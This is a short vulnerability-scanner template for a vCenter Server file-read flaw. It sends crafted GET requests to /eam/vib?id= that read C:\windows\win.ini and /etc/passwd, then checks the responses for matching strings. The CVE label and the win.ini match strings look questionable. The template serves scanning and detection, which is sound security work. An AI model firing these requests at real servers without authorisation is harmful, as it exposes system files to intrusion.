id: CVE-2020-3952 info: name: vCenter Server LFI risk: Critical params: - root: "{{.BaseURL}}" requests: - method: GET redirect: false url: >- {{.root}}//eam/vib?id=C:\windows\win.ini headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 detections: - >- StatusCode() == 200 && StringSearch("body", "driver") && StringSearch("body", "dbtype") - method: GET redirect: false url: >- {{.root}}//eam/vib?id=/etc/passwd headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 detections: - >- StatusCode() == 200 && StringSearch("body", "bin/bash") && StringSearch("body", "root:") references: - https://www.cvebase.com/cve/2020/3952